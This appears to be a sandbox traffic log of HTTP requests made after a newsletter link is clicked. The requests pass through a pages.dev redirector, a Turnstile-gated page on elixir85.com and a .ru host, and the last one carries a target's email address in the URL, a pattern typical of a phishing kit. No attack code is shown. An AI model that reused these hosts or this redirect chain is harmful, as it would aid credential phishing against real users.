          Source: global trafficHTTP traffic detected: GET /ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D HTTP/1.1Host: link.mail.beehiiv.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=IQ0kDKqsds0puoNbwl0LyUop2u8_fh4BRK0xcf65ZTM-1720033597-1.0.1.1-Tcc3DGThDR1gfTg7hvqQjB7YpHod4J4GL.JzRTX.pG4CYA4UhSlW62sqlRLkzt.0xW_kV3MuTbqb6L17ejXJdg
          Source: global trafficHTTP traffic detected: GET /?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post HTTP/1.1Host: ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-postAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /RfWAi/ HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/RfWAi/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik85WmNPeGFtNzFCRmZENHVOYmliOEE9PSIsInZhbHVlIjoiaFdXZDIrMXFxbGxvSHN0UzdvN3hGdHRETGl1MFR3R2h5MFVjMHhiSktjV01GeWsrTHgrT3lwMmpWY00vcGQzaW4yLy8rQ1dDNmQ2VW80WXpZT3VhWVlTUTA2SlExYTdpMVBhT1hkRVdVYVFlMG4rMlh3SUJXVlZJa2kyVVUrTk0iLCJtYWMiOiJhMmRjNTNjM2UyMmI3NjcyMmY0YTE5MjZlOThjMmEyZWViMWQ0MGUzOGU0ZDMwNzk0MDQwNDIwMzVkNzcxODU4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkxpcnF4Um5kMjBRai9UcjRVNHg5Z1E9PSIsInZhbHVlIjoiMVREMG4ydDhhbUhKZzVZbmxXK0pHdnFmKzZVWlF4Q1NuMFRudmlJeWVrYmQvMmpxOFB0Rm1lSFJ2RlZuOTVraHNnZzZQbC85c2xRYVZHNUp1UlNOVDRIQy83S3RaMmM0cFVrYlhadlVFbTdQV0ZIRzdJSHZWbjVQS1BMSnlwb1IiLCJtYWMiOiI0NjE0ZjhjZDdmZDMyYjUxNGYwYjczZWQyZDBmMWNmNTFlMDA0ZTUyNWZmN2Q0M2IwY2Q4MDUyODc1MzM1MDZkIiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDN HTTP/1.1Host: zichd.6gniu68.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://rfwai.elixir85.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /dbXLDQtpDSRBuBhVOTWKwXxoBYwUSJTUEAPHETTNOFYTDAHVOKJURMWUFLQPVMBESXVOSRVBAFBDN HTTP/1.1Host: zichd.6gniu68.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/d2a97f6b6ec9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://rfwai.elixir85.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d927bb0859422d HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d927bb0859422d/1720033614003/48Eq3BNYqb_JyY1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/89d927bb0859422d/1720033614003/48Eq3BNYqb_JyY1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/89d927bb0859422d/1720033614005/d8f6daa4d2e6b1fbc12647ee8c15bf2aca804b2a7df87a62cbd6f1b874522087/z2eJs3LKj-UAXpj HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/uf0no/0x4AAAAAAAdNpXskQfUxzmND/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1016911571:1720031246:aWlWO2XSgzbXSgRbyl1CFEiTI1VOUKePXlJl5xr3Kxo/89d927bb0859422d/9126e412fd5a54e HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /RfWAi/ HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://rfwai.elixir85.com/RfWAi/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InBaRm5LZmdUOUtQbEl2Q2xaVUdHaXc9PSIsInZhbHVlIjoiMDZXaWZ2NSt3bUM5aVUvbWdxVzE3SG0xRjFTMVRNcy9NVWkrbFhBV1V4ZmRrU3NWYzlnM2U4UHUzQkJYYnNzOTZib1pTN0ZtSUtvTk5MVWJ2OUFmdHJnUFRqcFpQaVF4MTd1aEVHM1g3ZDBoZS81ckhQTzlpMW8wcTIzNVV3SGEiLCJtYWMiOiI1ODA1YzM0Yjg4MTc3NzU5ODUzMThlYjIwODU0OWIzZDkzMzM4N2M1YWVmMDg3Yjc4MWY0Y2M1MjU0ZjkwY2QzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBWTTJjeWNzL1FHYzVsU00zZjBvZHc9PSIsInZhbHVlIjoiQ3RWY3J2bno2a0szcFpEcDlQYWpBalBwS0pybzBTMXVzU1FJOURnemJleldLb2R5aWZIZHVGZGZJWW92NE4vK2c0QSszNDVuZFc2Y0gyMTBkSHZWSlVLSTIzMS8xZ1EwSXdScTFSYlJEU3k4MkVzRFczUEo3bU5YOEFGTCs0VHUiLCJtYWMiOiJmMDQ5YjM3NzY0YzhmZmE3NzhhYzEwM2QxYmRiMzM0NWFlMmI2ZDZiNGY2YjA5NmQzZGEzYjUwNThiZjc1NjJjIiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /veVvvrbtHetJlBWJqFj8ZEAe7Nkuts2OfI7xSK2rw HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InBaRm5LZmdUOUtQbEl2Q2xaVUdHaXc9PSIsInZhbHVlIjoiMDZXaWZ2NSt3bUM5aVUvbWdxVzE3SG0xRjFTMVRNcy9NVWkrbFhBV1V4ZmRrU3NWYzlnM2U4UHUzQkJYYnNzOTZib1pTN0ZtSUtvTk5MVWJ2OUFmdHJnUFRqcFpQaVF4MTd1aEVHM1g3ZDBoZS81ckhQTzlpMW8wcTIzNVV3SGEiLCJtYWMiOiI1ODA1YzM0Yjg4MTc3NzU5ODUzMThlYjIwODU0OWIzZDkzMzM4N2M1YWVmMDg3Yjc4MWY0Y2M1MjU0ZjkwY2QzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlBWTTJjeWNzL1FHYzVsU00zZjBvZHc9PSIsInZhbHVlIjoiQ3RWY3J2bno2a0szcFpEcDlQYWpBalBwS0pybzBTMXVzU1FJOURnemJleldLb2R5aWZIZHVGZGZJWW92NE4vK2c0QSszNDVuZFc2Y0gyMTBkSHZWSlVLSTIzMS8xZ1EwSXdScTFSYlJEU3k4MkVzRFczUEo3bU5YOEFGTCs0VHUiLCJtYWMiOiJmMDQ5YjM3NzY0YzhmZmE3NzhhYzEwM2QxYmRiMzM0NWFlMmI2ZDZiNGY2YjA5NmQzZGEzYjUwNThiZjc1NjJjIiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /RfWAi/?vXalysa.a@centurybizsolutions.com HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rfwai.elixir85.com/RfWAi/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlhSUzFHOUw0NmtSOEg2Snlpb1VnMlE9PSIsInZhbHVlIjoiamxmaDRydjdNRDc1Zm41b2ptUUh4QVlFZDh5U2x4NjJydE1oL1gzM1Via3BldHJqcGFiZ3BFOTdFTTM2ZmlLZ2JIWUdDV1dBMVY2OExPZ0tJQkg1V1dlL29JczlsR2RjWm9qdndhZlREYUh6SmduZGt4Z2JWVDhtR2s4WmpiaFEiLCJtYWMiOiJjNzg3MTllNTZlZTQ4Mzg4MGJlZGU4NjUyZTMwMjAzNmM0YjRjMWI1MGMwYjk4OWRlNjYyZWZmM2Q2ZjA3NzY4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlSTlU5ZUtaV0JPMDFhanNKNVlnWUE9PSIsInZhbHVlIjoiVTdOMmVLdlVsMzJYM1JKMEtKaWlXTHFZNVdsTm96c1ZiMk92M25QRS9nS045bmRTeTZEOHFBaE5sZTRDbEhVVUp3OTVqL3F1eHVpZHVuc1pzeVVPZStSc1d5L2J4blYzWmxELytaR0hYMWN4WmJhaGZKZE5pV0xBT1lNWjBXSWgiLCJtYWMiOiJjMDJhMTQzMmE1OTE3M2UzYzc2ZjJhNGJiMDQ2MzEwOGQzMDlhMDJmYjc1OTczYTI2Yzk3ODM4MDZlMjdjYzFjIiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://rfwai.elixir85.com/RfWAi/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ilp2YjY4OFZKWDUvWlYrdGRJaUtYMXc9PSIsInZhbHVlIjoiYjVlUVBrRmdzekNRcGFJTlFzWlc1VXRsay94b2xHRlZmWnRaa1VOT0U1c1poS0NobEFpZ1o0bGlET2JYaFI3bHVBMlJFbFlTeG54bjRKNHJTQysvQW5wMGVzQS91cGJ5RlMzOU9RSUFSSkRpOGhISW9SWXYxUXE4T3RabDEvM3giLCJtYWMiOiIwZTNhNDM4NzZkNjUzZjU2NWUwNmFiOGY3MTM1YmFlNWMyOTllMDg1NWM0YTVhOGNhNDk5YWU3ODlmNzBkMWVjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFhYVZXak8rUVR6ZjIzUzUvdzNtT3c9PSIsInZhbHVlIjoiV1N2SFFIb1ROd3BQOVZseHNiR3dndGxDUXZpOW1XOVhUNGR0bXlVVDVFZUZGKzR5MllmS2xmaVNYYTJVdS8zZHg3MEpJUUIxU1RxYW1yZm9sUks4MVk0eDE2cUdPNW5QemVnS3loclVOVVlrcXh2ZG9xOUk2U1hYQUs2VHV4bjAiLCJtYWMiOiIzNzNlZmJmOTY1ZjFlYTE1MzRlZWFmNDQ1MzYzOWM3MTQwODU2MTMwNDM3OGE1ZDJmMjgyMTg5MmZkYzc1NjVkIiwidGFnIjoiIn0%3D
